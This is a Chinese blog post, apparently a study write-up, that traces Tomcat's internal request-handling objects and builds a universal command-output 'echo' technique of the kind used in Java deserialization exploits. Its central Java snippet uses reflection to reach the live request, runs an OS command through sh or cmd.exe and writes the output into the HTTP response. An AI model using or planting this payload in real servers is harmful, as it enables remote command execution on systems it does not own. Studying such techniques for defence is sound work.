springboot数据回显_tomcat回显学习-2

最新推荐文章于 2023-08-23 20:25:37 发布
最新推荐文章于 2023-08-23 20:25:37 发布
阅读量677 收藏
点赞数
文章标签: springboot数据回显
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34447182/article/details/113319224
版权

tomcat通用回显学习-2

在上一篇中, 学习了tomcat回显的第一种方法,说实话并不确定是否通用, 和 lucifaer师傅的两种办法都不一致, 仅仅在测试环境中发现是可以回显的.
本篇即学习 lucifaer师傅文章Tomcat通用回显学习中的其中一种方法, 通过 global变量获取 request并回显数据

环境搭建

因为 springboot的项目自带 tomcat,所以使用的是 spring项目. 其他的环境需要自己来配置了
  1. git clone https://github.com/itinypocket/spring-boot-study.git
  2. 这里随便挑了spring-boot-upload
  3. UploadController里添加一个函数@GetMapping("/upload2") public String upload2() { String string = "123123"; return "upload"; }
  4. 断点打在String string="123123"; 这一行上
  5. Debug模式运行 断点如下

b8bb234376a71f9827bf8263d295a42a.png

前期调试

在上一篇中, 我们在追踪 request变量时,进入了 Connector类, 同样,这里还是由该类开始, 之前的调试不再复述

AbstractProtol.java类中, 可以下断点到790行,部分代码片段为

if (processor == null) {
    processor = getProtocol().createProcessor();
    register(processor);
}

processor.setSslSupport(
	wrapper.getSslSupport(getProtocol().getClientCertProvider()));

// Associate the processor with the connection
connections.put(socket, processor);

SocketState state = SocketState.CLOSED;
do {
    state = processor.process(wrapper, status);

可以看到, 在process==null时, 会通过getProtocol().createProcessor()先创建, 并调用了register函数, 跟进register函数

long count = registerCount.incrementAndGet();
RequestInfo rp =
    processor.getRequest().getRequestProcessor();
rp.setGlobalProcessor(global);
ObjectName rpName = new ObjectName(
	getProtocol().getDomain() +
	":type=RequestProcessor,worker="
	+ getProtocol().getName() +
	",name=" + getProtocol().getProtocolName() +
	"Request" + count);
if (getLog().isDebugEnabled()) {
    getLog().debug("Register " + rpName);
}
Registry.getRegistry(null, null).registerComponent(rp,
	rpName, null);
rp.setRpName(rpName);

可看到, RequestInfo变量作为global 的值进行了设置, 继续看一下setGlobalProcessor函数

//RequestInfo.java
global.addRequestProcessor( this );

thisRequestInfo对象添加到了global, 跳回AbstractProtol类,看一下global的声明

protected static class ConnectionHandler<S> implements AbstractEndpoint.Handler<S> {

        private final AbstractProtocol<S> proto;
        private final RequestGroupInfo global = new RequestGroupInfo();

可以看到 global对象为RequestGroupInfo类实例. 于是现在的问题在于如何获取global, 即 RequestGroupInfoglobal又是 AbstractProtocol#ConnectionHandler类实例的一个变量, 所以调用链变成了

AbstractProtocol#ConnectionHandler ->
    global(RequestGroupInfo) ->
        RequestInfo ->
	   processor# Request ->
		Response

找到 global

由文章: 深入了解Tomcat的系统架构 知道, 请由先由Connector获取, 经过ProtocolHandler处理完, 再交给Processor处理,最后返回。 所以由上一篇文章, 然后回到Connector寻找是否有global的变量

d6b4ee5b2135e18669afa63a8a69fea9.png

5145179e8df767920f4b12c2de7001d7.png

由上两张图可以看到, connector变量中存在着getProtocolHandler函数, 该函数的返回值中handler变量为AbstractProtocol#ConnectionHandler 于是调用链变成了

connector ->
    getProtocolHandler ->
        hanlder ->
            global -> 
              ...

找到cononector变量

同样由上篇tomcat架构的文章, 我们知道connector是由service服务来调用的, 而在 类org.apache.catalina.connector.CoyoteAdapter中,

connector.getService().getContainer().getPipeline().getFirst().invoke(
	request, response);

跟进connector.getService函数, 进入接口类public interface Service extends Lifecycle中, 利用idea的功能,找到其继承类StandardService

StandardService类中, 可以看到

protected Connector connectors[] = new Connector[0];
    ....
    @Override
    public void addConnector(Connector connector) {
        ...
    }

    @Override
    protected void initInternal() throws LifecycleException {

        super.initInternal();
        ...
        // Initialize our defined Connectors
        synchronized (connectorsLock) {
            for (Connector connector : connectors) {
                try {
                    connector.init();
                } catch (Exception e) {

所以可以在StandardService中找到connectors[]数组, 遍历输出 整个调用链变成了

StandardService ->
    connector[] ->
        getProtocolHandler ->
            handler  ->
                golbal ->
                    RequestGroupInfo ->
                         ....

实现

@GetMapping("/upload2")
    public String upload2() throws IOException, NoSuchFieldException, IllegalAccessException, NoSuchMethodException, InvocationTargetException {
        String string = "1231231";
        java.lang.reflect.Field contextField = org.apache.catalina.core.StandardContext.class.getDeclaredField("context");
        java.lang.reflect.Field serviceField = org.apache.catalina.core.ApplicationContext.class.getDeclaredField("service");
        java.lang.reflect.Field requestField = org.apache.coyote.RequestInfo.class.getDeclaredField("req");
        java.lang.reflect.Method getHandlerMethod = org.apache.coyote.AbstractProtocol.class.getDeclaredMethod("getHandler",null);
        contextField.setAccessible(true);
        serviceField.setAccessible(true);
        requestField.setAccessible(true);
        getHandlerMethod.setAccessible(true);
        org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =
                (org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();
        org.apache.catalina.core.ApplicationContext applicationContext = (org.apache.catalina.core.ApplicationContext) contextField.get(webappClassLoaderBase.getResources().getContext());
        org.apache.catalina.core.StandardService standardService = (org.apache.catalina.core.StandardService) serviceField.get(applicationContext);
        org.apache.catalina.connector.Connector[] connectors = standardService.findConnectors();
        for (int i=0;i<connectors.length;i++) {
            if (4==connectors[i].getScheme().length()) {
                org.apache.coyote.ProtocolHandler protocolHandler = connectors[i].getProtocolHandler();
                if (protocolHandler instanceof org.apache.coyote.http11.AbstractHttp11Protocol) {
                    Class[] classes = org.apache.coyote.AbstractProtocol.class.getDeclaredClasses();
                    for (int j = 0; j < classes.length; j++) {
                        if (52 == (classes[j].getName().length())||60 == (classes[j].getName().length())) {
                            System.out.println(classes[j].getName());
                            java.lang.reflect.Field globalField = classes[j].getDeclaredField("global");
                            java.lang.reflect.Field processorsField = org.apache.coyote.RequestGroupInfo.class.getDeclaredField("processors");
                            globalField.setAccessible(true);
                            processorsField.setAccessible(true);
                            org.apache.coyote.RequestGroupInfo requestGroupInfo = (org.apache.coyote.RequestGroupInfo) globalField.get(getHandlerMethod.invoke(protocolHandler,null));
                            java.util.List list = (java.util.List) processorsField.get(requestGroupInfo);
                            for (int k = 0; k < list.size(); k++) {
                                org.apache.coyote.Request tempRequest = (org.apache.coyote.Request) requestField.get(list.get(k));
                                System.out.println(tempRequest.getHeader("tomcat"));
                                org.apache.catalina.connector.Request request = (org.apache.catalina.connector.Request) tempRequest.getNote(1);
                                String cmd = "" + "ls" +"";
                                String[] cmds = !System.getProperty("os.name").toLowerCase().contains("win") ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};
                                java.io.InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();
                                java.util.Scanner s = new java.util.Scanner(in).useDelimiter("a");
                                String output = s.hasNext() ? s.next() : "";
                                java.io.Writer writer = request.getResponse().getWriter();
                                java.lang.reflect.Field usingWriter = request.getResponse().getClass().getDeclaredField("usingWriter");
                                usingWriter.setAccessible(true);
                                usingWriter.set(request.getResponse(), Boolean.FALSE);
                                writer.write(output);
                                writer.flush();
                                break;
                            }
                            break;
                        }
                    }
                }
                break;
            }
        }

        return "1234";
}

8a10ebdd0427aa5c1ad14110c04aad83.png

总结

在了解tomcat架构后, 对于request的调用, processorConnector, Service等之间的调用更加清楚了, 这里的每一次向上跟踪也不会搞的云里雾里的.

主要是根据lucifaer的文章, 大佬真强!

参考

  • Tomcat通用回显学习
  • 深入了解Tomcat的系统架构

TODO

  • 复现第三种办法, 即 register获取request
西天取经路遥迢
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Tomcat 通用回显分析
Vicl1fe的博客
08-11 688
前言 最近在研究Java 反序列化的漏洞回显方式,就发现自己tm菜的抠脚。太难了。 测试环境 <parent> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter-parent</artifactId> <version>2.0.7.RELEASE</version> </parent&g
springboot实现图片或者其他回显功能
weixin_59244784的博客
10-24 1105
springboot实现图片或者其他回显功能
SpringBoot--件上传并回显
吴声子夜歌的博客
12-11 1164
SpringBoot件上传 SpringMVC对件上传做了简化,在SpringBoot中对此做了更进一步的简化,件上传更加方便。 Java中的件上传一共涉及两个组件,一个是CommonsMultipartResolver,另一个是StandardServletMultipartResolver,其中CommonsMultipartResolver使用commons-fileupload来处...
Thymeleaf+springboot回显select数据
anlu的博客
03-11 970
前端页面 <div class="form-group"> <label class="col-sm-3 control-label">所属公司:</label> <div class="col-sm-8"> <select id="...
SpringBoot件上传和回显(含数据库字段设置和背景图片设置)
拧发条鸟的博客
05-30 1052
SpringBoot件上传和回显 思路 将上传的件保存在服务器硬盘中,将件路径保存在mysql数据库中。这样可以节省数据库的内存。 所以数据库中的字段为varchar。 对应实体类的属性为String。 1.准备条件 1.件上传表单必备条件 method属性设置为post。 enctype属性设置为"multipart/form-data" 提供 件上传输入框。 2.导入依赖 <dependency> <groupId>commons-fileupload
SpringBoot之图片上传与回显
08-18
SpringBoot框架中,图片上传和回显是常见的功能需求,尤其对于开发涉及用户交互的Web应用时。本将深入探讨如何实现这个功能,并提供一个简单易懂的实践示例。 首先,我们要理解SpringBoot的核心组件SpringMVC,...
cmd_火山PC_cmd_CMD回显_
10-01
标题中的"cmd_火山PC_cmd_CMD回显_"表明我们讨论的主题是关于在Windows操作系统中,使用命令行工具CMD(Command Prompt)与火山PC软件相结合,进行注册表的回显操作。火山PC是一款针对64位系统的软件,版本为...
pipe-CMD.rar_CMD回显_CreateProcess_c++ cmd pipe_windows管道cmd_管道 c
07-15
利用管道执行cmd,显示回显内容,管道加createprocess实现该功能
详解关于element级联选择器数据回显问题
10-17
2. 在编辑或更新表单时,将后端返回的数据(通常是 ID)转换为级联选择器所需的选中路径数组。 3. 使用递归方法遍历整个部门树,查找与给定 ID 匹配的路径,并返回这个路径作为级联选择器的选中值。 通过以上步骤,...
基于layui的下拉列表的数据回显方法
10-16
今天小编就为大家分享一篇基于layui的下拉列表的数据回显方法,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
SpringMVC_数据回显
jiangminyan的博客
12-04 460
1 什么是数据回显 提交后,如果出现错误,将刚才提交的数据回显到刚才的提交页面 2 pojo数据回显方法 1)springmvc默认对pojo数据进行回显 pojo数据传入controller方法后,springmvc自动将pjo数据放到request域,key等于pojo类型简(首字母小) @ModelAttribute指定pojo回显到页面在request中的key
Springboot+vue后台管理系统-数据回显+增删改查的实现
justleavel的博客
02-01 6309
上一篇章已经基本搭建好了框架并且实现了与数据库的对接,我们这篇章来讲解怎样完成数据的增删改查 首先是上一篇的新增,但是数据没有回显在前端: 我们首先需要在后端一个查询数据数据的方法可以将数据显现出来: 我们这里是分页查询,所以需要给他传两个值,分别是当前页和每页条数:这里的我们默认不传参就是第一页然后十条数据 /** * 查询数据 模糊查询 */ @GetMapping public Result<?> findPage(
springmvc的数据回显
李卫康的博客
08-08 3276
数据回显:提交后,如果出现错误,将刚才提交的数据回显到刚才的提交页面。 1、springmvc默认对pojo数据进行回显。 pojo数据传入controller方法后,springmvc自动将pojo数据放到request域,key等于pojo类型(首字母小)  使用@ModelAttribute指定pojo回显到页面在request中的key 修改页面中: handler中的
tomcat回显
hongduilanjun的博客
03-26 4237
Demo package com.naihe; import javax.servlet.ServletException; import javax.servlet.annotation.WebServlet; import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import java.io.B
十六 SpringBoot整合Mybatis完成用户更新-数据回显
fangguozi的专栏
02-28 1361
更新用户之前的查询,并将数据在页面中回显。 1 在mapper接口中添加用户方法方法(UsersMapper.java) Users selectUsersById(Integer id); 2 在映射配置件中添加相关代码(UsersMapper.xml) &lt;select id="selectUsersById" resultType="users"&gt; select...
SpringBoot案例-修改员工-查询回显
最新发布
weixin_64939936的博客
08-23 195
在员工信息栏的右侧存在一个编辑按钮,点击该按钮可以对员工信息进行修改,但是修改之前,会出现上述页面,将员工原有的信息进行展示回显。实现的编辑窗口回显员工已有信息的操作也比较简单,主要是通过id对员工信息进行查询,具体的要求可以参照接口档中的具体内容。
SpringBoot----thymeleaf的修改数据页面简单例子35
weixin_39337047的博客
09-01 1663
这里的修改和添加页面是同一个 如下简单的html代码为示例 <form th:action="@{/emp}" method="post"> <!--需要区分是员工数据--> <!-- 1.springMVC中配置了HiddenHttpMethodFilter;(SpringBoot自动配置好的) 2.页面创建...
基于Springboot外卖系统17: 新增套餐模块+餐品信息回显+多数据表存储
热门推荐
小李的研究生学习日记
08-19 1万+
所以这个时候我们使用Setmeal就不能完成参数的封装了,我们需要在Setmeal的基本属性的基础上,再扩充一个属性 setmealDishes 来接收页面传递的套餐关联的菜品列表,而我们在准备工作中,导入进来的SetmealDto能够满足这个需求。本次查询分类列表,传递的type为1,表示需要查询的是菜品的分类。后台系统中可以管理套餐信息,通过新增套餐功能来添加一个新的套餐,在添加套餐时需要选择当前套餐所属的套餐分类和包含的菜品,并且需要上传套餐对应的图片,在移动端会按照套餐分类来展示对应的套餐。
SpringBoot同步进行增删改
暗武逢天的博客
06-20 1万+
springboot同步增删改 首先创建好springboot空项目 1.进行数据源配置: 在这里插入代码片 server.port=8090 #配置数据源 #spring.datasource.username=root #spring.datasource.password=928732275 #spring.datasource.url=jdbc:mysql://localhost:3306/demo6?serverTimezone=Asia/Shanghai #spring.datasource.
java数据回显_Java Web之SpringMVC 进行数据回显
05-29
在SpringMVC中进行数据回显可以通过在Controller中将需要回显数据放入Model对象中,然后在JSP页面中使用EL表达式进行取值展示。 例如,在Controller中可以这样设置回显数据: ``` @RequestMapping("/user/{id}")...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值